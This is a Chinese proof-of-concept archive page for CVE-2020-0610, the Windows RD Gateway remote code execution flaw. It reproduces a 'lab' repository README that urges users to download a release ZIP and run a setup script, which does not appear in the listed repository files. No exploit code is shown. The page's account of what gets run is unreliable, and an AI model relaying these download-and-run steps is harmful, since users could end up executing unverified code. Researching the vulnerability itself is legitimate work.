关联漏洞
标题:
微软 Microsoft Windows 输入验证错误漏洞
(CVE-2020-0610)
描述:Microsoft Windows是美国微软(Microsoft)公司的一套个人设备使用的操作系统。 Microsoft Windows Remote Desktop Gateway (RD Gateway)中存在远程代码执行漏洞。攻击者可通过使用RDP连接到目标系统并发送特制的请求利用该漏洞在目标系统上执行任意代码。以下产品及版本受到影响:Microsoft Windows Server 2012,Windows Server 2012 R2,Windows Server 2016,Windows Se
描述
🔍 Create a safe lab environment for testing CVE-2020-0610, a critical RCE vulnerability in Windows RD Gateway, with minimal disruption using DTLS techniques.
介绍
# 🎉 lab-cve-2020-0610 - Learn About a Security Vulnerability
## 🚀 Getting Started
Welcome to the lab-cve-2020-0610 project. This lab helps users understand the CVE-2020-0610 vulnerability known as BlueGate. It focuses on a weakness in Windows RD Gateway that can lead to remote code execution.
## 📥 Download Now
[](https://github.com/Riocipta75/lab-cve-2020-0610/releases)
## 📂 Overview
This repository contains PowerShell scripts and setup guides that demonstrate how to explore this vulnerability. You will also find examples validating the vulnerability using Nuclei templates.
### 🌟 Features
- Clear setup guide.
- PowerShell scripts for testing.
- Examples for validating vulnerabilities.
- Designed for educational purposes.
## 🖥️ System Requirements
- Operating System: Windows 10 or later.
- Processor: Modern x64 processor.
- RAM: Minimum 4 GB.
- Disk Space: At least 100 MB for installation.
## 🔧 Installation Instructions
1. **Visit the Download Page**
Go to the releases page to download the necessary files: [Download Page](https://github.com/Riocipta75/lab-cve-2020-0610/releases).
2. **Download the Files**
Choose the latest release and download the ZIP file. Ensure you save it in a location you can easily access.
3. **Extract the ZIP File**
Right-click the downloaded ZIP file and select "Extract All." Follow the prompts to extract the contents.
4. **Open PowerShell**
Press the Windows key, type "PowerShell," and hit Enter. You need to run the scripts using PowerShell.
5. **Run the Setup Script**
Navigate to the folder where you extracted the files. Type `cd path\to\your\extracted\folder`, replacing `path\to\your\extracted\folder` with the actual path. Then, run `.\setup-script.ps1` to set everything up.
6. **Explore the Lab**
You can now run the various PowerShell scripts provided. Follow the setup guide for detailed instructions on how to use each script.
### 💻 Running the Tests
After the setup is complete, you can initiate the tests. Each script will contain comments explaining its purpose.
## 📄 Usage Guidelines
- Use this lab for educational and research purposes only.
- Make sure you have permission to test on any servers you run the scripts against.
- Be aware of legal and ethical considerations when exploring vulnerabilities.
## 🔗 Additional Resources
- [PowerShell Documentation](https://docs.microsoft.com/en-us/powershell/)
- [Nuclei Documentation](https://nuclei.projectdiscovery.io/)
## 💬 Questions & Feedback
If you have any questions or feedback, feel free to open an issue on this GitHub repository. Your input helps improve this project!
## 📥 Download Again
Ready to start? Visit the releases page once more: [Download Page](https://github.com/Riocipta75/lab-cve-2020-0610/releases).
Thank you for exploring the lab-cve-2020-0610 project. Enjoy your experience!
文件快照
[4.0K] /data/pocs/b36f6fecf7eb802d2c372c255cdcfbd722302e9f
├── [2.9K] README.md
├── [4.0K] samples
│ ├── [ 171] nuclei-debug-patched.txt
│ └── [ 149] nuclei-debug-vulnerable.txt
└── [4.0K] scripts
├── [ 426] add-udp-3391-firewall.ps1
└── [ 457] sanity-check.ps1
2 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。